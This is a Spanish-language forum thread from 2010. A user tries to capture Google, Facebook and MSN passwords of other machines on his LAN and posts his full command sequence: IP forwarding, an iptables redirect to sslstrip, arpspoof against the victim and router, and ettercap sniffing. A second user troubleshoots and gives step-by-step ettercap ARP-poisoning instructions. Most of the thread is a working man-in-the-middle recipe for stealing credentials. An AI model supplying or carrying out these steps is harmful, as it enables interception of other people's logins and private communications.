Ettercap+Sslstrip

Iniciado por Goshin, 9 Marzo 2010, 21:30 PM

0 Miembros y 1 Visitante están viendo este tema.

Goshin

Buenas posteo para ver si alguien puede echar un poco de luz a mi problema, he leido todos los posts sobre ettercap y sslstrip que hay en el foro he googleado y aun asi no he encontrado la causa de mi problema que a continuacion indico:
Router 192.168.2.1 Router Belkinip
Pc del escaneo 192.168.2.10
Estoy intentando capturar las contraseñas de google,facebook,msn.... de mi red con Ettercap y sslstrip lo que hago es:
En una Terminal:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Segundo terminal:
arpspoof -i eth1-t 192.168.2.10 192.168.2.1
Tercer terminal:
python sslstrip.py -a
Cuarto terminal:
ettercap -T -q -i eth1

Lo que me da el ettercap es lo sigiente:
DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10
DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin"

Entonces nose si es por el DHCP o por otra cosa he desactivado el firewall del router y sige igual, tambien he provado a usar el ARP Spoof del ettercap y nada.... Espero que alguien pueda ayudarme o darme una pista. mil gracias


kamsky

hombre, es que lo de hacerte un MiM a ti mismo... es un poco raro cuanto menos!

prueba a hacerlo en un par de VM
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Goshin

#2
Mil perdones la ip 192.168.2.10 es otro pc que tengo en la red, lo he provado con otro pc mas y lo mismo(modifico el post original, es que estaba mi novia al lado hablandome y no me fije)
Muchas gracias por responderme Kamsky de verdad

kamsky

tienes que hacer el MiM completo, sólo lo estás haciendo en un sentido de la conexión
ya que usas ettercap para capturar tráfico, úsalo también para hacer el Arp Poisoning
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Goshin

Gracias por responderme si te refieres a :
terminal1 : arpspoof -i eth1-t 192.168.2.10 192.168.2.1
terminal2 : arpspoof -i eth1-t 192.168.2.1 192.168.2.10
ya lo he probado , supongo que te refieres a eso, y no he tenido ningun resultado

kamsky

vamos por partes, primero olvídate del sslstrip y consigue que funcione el MiM, hazlo con ettercap
# sudo ettercap -C
Sniff -> Unified Sniffing-> tu tarjeta de red
Hosts->Scan for Hosts
Hosts-> Hosts List -> seleccionas la víctima con el 1, y el router con el 2
Mitm->Arp Poisoning-> remote
Start->Start Sniffing

una vez hecho esto, navega , manda mails o lo que sea pero en páginas no seguras, te debería de capturar todo...
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Goshin

#6
Primero de todo gracias por dedicarme tu tiempo y tu ayuda.
lo que me comentas lo he probado y sale el mismo mensaje. En principio captura paquetes y veo conexiones de msn y facebook en View> Connections pero en User messages me sale lo que comente:
DHCP: [00:22:75:8E:XX:XX] REQUEST 192.168.2.10
DHCP: [192.168.2.1] ACK : 192.168.2.10 255.255.255.0 GW 192.168.2.1 DNS 192.168.2.1 "Belkin"
sinceramente nose que puede ser, de doy otra vez las gracias por ayudarme en este asunto
Edito:Los paquetes que veo de msn, facebook se ven al ver los paquetes pero no se pueden leer ni conversacions ni pass ni nada como mucho alguna cuenta de msn tipo xxxx@hotmail.com

kamsky

asegurate de que se haya hecho bien el arp poisoning, mira la tabla arp en la víctima a ver si tiene la misma dirección MAC para tu IP y la del router
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Goshin

Hm las direccion MAC no cambian , cada uno tiene su direccion mac respectiva O_o en principio mi direccion mac y la del pc a escanear tendrian que ser iguales , no?

kamsky

en la Víctima tienen que corresponder las MACS del router con la tuya, de forma que cuando este Pc mande datos al router, en realidad te los esté mandando a tí, que los retransmites al router verdadero (por esto la necesidad de activar el forwarding), y en el sentido contrario pues lo mismo, si no sucede esto es que no se está haciendo correctamente el arp poisoning
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!